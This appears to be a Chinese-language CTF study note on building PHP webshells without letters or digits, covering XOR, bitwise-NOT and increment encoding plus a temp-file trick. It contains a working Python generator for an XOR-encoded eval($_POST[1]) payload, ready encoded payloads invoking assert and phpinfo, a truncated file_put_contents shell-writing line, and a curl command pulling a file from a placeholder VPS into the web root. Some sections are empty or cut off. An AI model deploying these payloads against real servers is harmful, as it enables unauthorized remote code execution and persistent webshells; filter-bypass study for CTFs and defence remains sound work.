无数字字母RCE

无数字字母RCE，这是一个老生常谈的问题，就是不利用数字和字母构造出webshell，从而能够执行我们的命令。

例如这样的过滤，就要利用各种非字母数字的字符，通过各种变换如异或、取反、自增等方法构造出单个的字母字符，然后将这些构造出的字符拼接成一个函数名，然后就可以达成RCE

异或^

这里的异或，指的是php按位异或，在php中，两个字符进行异或操作后，得到的依然是一个字符，所以说当我们想得到a-z中某个字母时，就可以找到两个非字母数字的字符，只要他们俩的异或结果是这个字母即可。而在php中，两个字符进行异或时，会先将字符串转换成ascii码值，再将这个值转换成二进制，然后一位一位的进行按位异或，异或的规则是：1^1=0,1^0=1,0^1=1,0^0=0，简单的来说就是相同为零，不同为一

具体参考这个表格：

假如说我们想要构造出小写字母a，按照上表，a的二进制为01100001，那我们就可以选择两个非字母数字的字符进行异或，这里有很多种选法，我选择的是@和!这两个，就能成功异或出字母a

import re
import urllib.parse
import requests


def generate_xor_expression(payload, filter_regex):
    """
    根据目标 payload 和过滤正则表达式，生成异或表达式。
    参数:
        payload: 目标字符串
        filter_regex: 用于过滤字符的正则表达式
    返回:
        构造的异或表达式字符串
    """
    xor_1 = ''
    xor_2 = ''
    usable_chars = []

    # 找到没有被过滤的可用字符
    for i in range(0xff):
        if chr(i) not in filter_regex:
            usable_chars.append(chr(i))

    # 遍历目标 payload 的每个字符，找到对应的异或字符对
    for k in range(len(payload)):
        for i in usable_chars:
            if chr(ord(i) ^ 127) == payload[k]:  # 检查两个字符异或结果是否等于目标字符
                xor_1 += i
                xor_2 += chr(127)
                continue

    # 构建最终的表达式，将字符进行URL编码
    return "('" + urllib.parse.quote(xor_1) + "'^'" + urllib.parse.quote(xor_2) + "')"


# 测试函数
if __name__ == "__main__":
    payload = "eval($_POST[1]);"  # 要生成的目标 payload
    filter_regex = r'[a-zA-Z0-9]'  # 定义过滤正则表达式
    result = generate_xor_expression(payload, filter_regex)  # 调用函数
    print(result)  # 打印最终生成的表达式

这是一个简单的异或构造的脚本，可以生成payload

取反~

就像这样，得到结果为：

(~%9E%8C%8C%9A%8D%8B)(~%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%C4);

自增

利用自增，例如

"a"++ => "b"

所以，只要能够得到一个字符，我们就可以通过自增或自减的方式得到所有的字母。那么，要如何得到一个字母，例如A，在PHP中，强制连接数组和字符串的话，数组将会被转化为字符串，其值为“Array”。再取这个字符串的第一个字母，就可以得到A。

大佬的payload：

PHP7和PHP5中的特性

assert是无字母数字RCE中很重要的一个函数，但是php5和php7中的这个函数是有区别的。在php5中，assert是一个函数，因此我们可以动态调用。但是在PHP7中，assert不再是一个函数，而是变成了一个语言结构，不能再作为函数名动态执行代码。在php7中，可以通过($a)()这样的方式来执行命令，也就是说我们对phpinfo取反之后就可以直接执行了，亦或用file_put_contents来写shell。

例如php7中想执行phpinfo()，可以写成(phpinfo)()，利用取反构造payload：

(~%8F%97%8F%96%91%99%90)() // phpinfo

同理也可以直接写马

file_put_contents('4.php','

在php5中，不支持用($a)()这样的语句来调用函数，但是在php5中assert是一个函数，我们可以通过$f='assert';$f(...);这样的方法来动态执行任意代码

无字母数字webshell之提高篇 | 离别歌这里面有，等我仔细攻读一下

临时文件

临时文件目录：

Linux临时文件主要存储在/tmp/目录下，格式通常是（/tmp/php[6个随机字符]）

Windows临时文件主要存储在C:/Windows/目录下，格式通常是（C:/Windows/php[4个随机字符].tmp）

大概就是在自己的vps上写一个命令执行的txt，然后在题目post该命令

curl http://your_vps/1.txt > /var/www/html/1.php

然后 ?cmd=?>

为什么可以这样执行呢？因为在linux里，如果一个文件里有命令，是可以通过这个文件名执行命令的，这里我们相当于使用临时文件执行了命令